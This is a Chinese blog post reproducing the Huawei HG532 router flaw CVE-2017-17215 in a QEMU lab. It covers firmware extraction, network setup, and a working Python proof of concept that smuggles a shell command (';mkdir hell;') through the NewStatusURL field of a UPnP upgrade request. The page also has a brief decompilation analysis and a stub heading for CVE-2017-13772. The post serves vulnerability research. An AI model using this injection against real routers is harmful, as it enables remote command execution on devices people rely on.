首页 > 其他分享 >华为路由器漏洞CVE-2017-17215

华为路由器漏洞CVE-2017-17215

时间:2024-07-25 13:39:45浏览次数:9  
标签:24 sudo 192.168 153.2 17215 2017 CVE root

固件获取

https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/HUAWEI/CVE-2017-17215/firmware

提取

binwalk -Mer HG532eV100R001C01B020_upgrade_packet.bin

启动qemu-system

sudo qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet -nographic

传输文件

sudo brctl addbr Virbr0
sudo ifconfig Virbr0 192.168.153.1/24 up
sudo tunctl -t tap0
sudo ifconfig tap0 192.168.153.11/24 up
sudo brctl addif Virbr0 tap0
ifconfig eth0 192.168.153.2/24 up
scp -r squashfs-root/ [email protected]:~/

启动固件

#挂载dev和proc
mount -o bind /dev ./squashfs-root/dev
mount -t proc /proc ./squashfs-root/proc
chroot squashfs-root/ /bin/sh


然后用ssh另起一个终端

ssh [email protected]

chroot squashfs-root /bin/sh
upnp
mic

到这里ip会被修改,通过qemu的终端改回来

ifconfig eth0 192.168.153.2/24 up
ifconfig br0 192.168.153.11/24 up

不知道为什么浏览器访问不了,但是poc能通

POC

import requests 
headers = {
    "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
}

data = '''<?xml version="1.0" ?>
 <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
   <NewStatusURL>;mkdir hell;</NewStatusURL>
   <NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
  </u:Upgrade>
 </s:Body>
</s:Envelope>
'''
requests.post('http://192.168.153.2:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)

image.png

漏洞分析

通过官方poc知道漏洞点在NewStatusURL
image.png
需要把NewStatusURL这里patch了才能反编译
image.png
猜测一下,a13应该是NewStatusURL传入的参数,并且这个参数用户可控,导致了任意命令执行

CVE-2017-13772

固件获取

https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/TP-Link/CVE-2017-13772/firmware


标签:24,sudo,192.168,153.2,17215,2017,CVE,root
From: https://www.cnblogs.com/blonet/p/18322828

相关文章

  • G71 可删除线性基+离线处理 P3733 [HAOI2017] 八纵八横
    视频链接:G71可删除线性基+离线处理P3733[HAOI2017]八纵八横_哔哩哔哩_bilibili   G67线性基+贪心法P4151[WC2011]最大XOR和路径-董晓-博客园(cnblogs.com) P3733[HAOI2017]八纵八横-洛谷|计算机科学教育新生态(luogu.com.cn)//可删除线性基+离......
  • P3957[NOIP2017普及组]跳房子
    https://www.luogu.com.cn/problem/P3957https://class.51nod.com/Html/Textbook/ChapterIndex.html#textbookId=126&chapterId=337显然,但是维护滑动窗口有技巧,不能每次插入一个值,因为维护\(x\)不方便。所以考虑一个\(cur\),每次对于新的\(i\)不能跳过时移动\(cur\),然后队......
  • 服务攻防-应用协议cve
    Cve-2015-3306背景:ProFTPD1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和sitecpto命令读取和写入任意文件。任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobod......
  • 开发日志:windows修复SSL漏洞CVE-2016-2183(3389端口)
    漏洞危害:具有足够资源的中间人攻击者可利用此漏洞,通过“birthday”攻击检测会在固定密码与已知纯文本之间泄露XOR的冲突,进而泄露密码文本(例如安全HTTPSCookie),并可能导致劫持经认证的会话。参见《支持SSL64位块大小的密码套件(SWEET32)-修复方案》参考资料:https://blog.cs......
  • SpiderFlow RCE漏洞(CVE-2024-0195)
    0x01前言SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。影响范围:Upto(including)<=0.5.0漏......
  • 【漏洞复现】SuiteCRM SQL注入漏洞(CVE-2024-36412)
    0x01产品简介SuiteCRM是一款屡获殊荣的企业级开源客户关系管理系统,它具有强大的功能和高度的可定制性,且完全免费。0x02漏洞概述SuiteCRM存在SQL注入漏洞,未经身份验证的远程攻击者可以通过该漏洞拼接执行SQL注入语句,从而获取数据库敏感信息。0x03搜索引擎title="Suit......
  • [BJOI2017] 树的难题
    这道题目卡常卡了两个半小时仍然没有卡过。。。等进队了让队友帮忙卡一下吧主要想一下思路最主要的就是在计算路径长度的时候,假设当前递归到了点\(i\),那么从点\(i\)出发的两条路径合并在一起,如果第一条边的颜色相同的话就会重复计算,为了解决这个问题,我们只用对每个点进行排序,将......
  • Goby漏洞发布 | CVE-2024-4879 ServiceNowUI /login.do Jelly模板注入漏洞【已复现】
    漏洞名称:ServiceNowUI/login.doJelly模板注入漏洞(CVE-2024-4879)EnglishName:ServiceNowUI/login.doInputValidationVulnerability(CVE-2024-4879)CVSScore:9.3漏洞描述:ServiceNow是一个业务转型平台。通过平台上的各个模块,ServiceNow可用于从人力资源和员工管理到自动......
  • Microsoft SQL Server 2017 RTM GDR (CU31+GDR) 发布,修复高危安全漏洞
    MicrosoftSQLServer2017RTMGDR(CU31+GDR)发布,修复高危安全漏洞SQLServerNativeClientOLEDB提供程序远程代码执行漏洞CVE-2024-35272修复请访问原文链接:https://sysin.org/blog/sql-server-2017/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgSQLSer......
  • [THUSCH2017] 大魔法师
    前期准备1.熟练的掌握区间修改线段树2.对矩阵乘法有部分的了解,知道如何使用3.对卡常十分精通题目大意题目给定\(n\)个三元组,每个三元组包含\(A\)、\(B\)、\(C\)三个元素,一共进行\(m\)次操作,分别是下面七种之一:1.令给定区间内,\(A_i=A_i+B_i\)2.令给定区间内,\(B_i=B......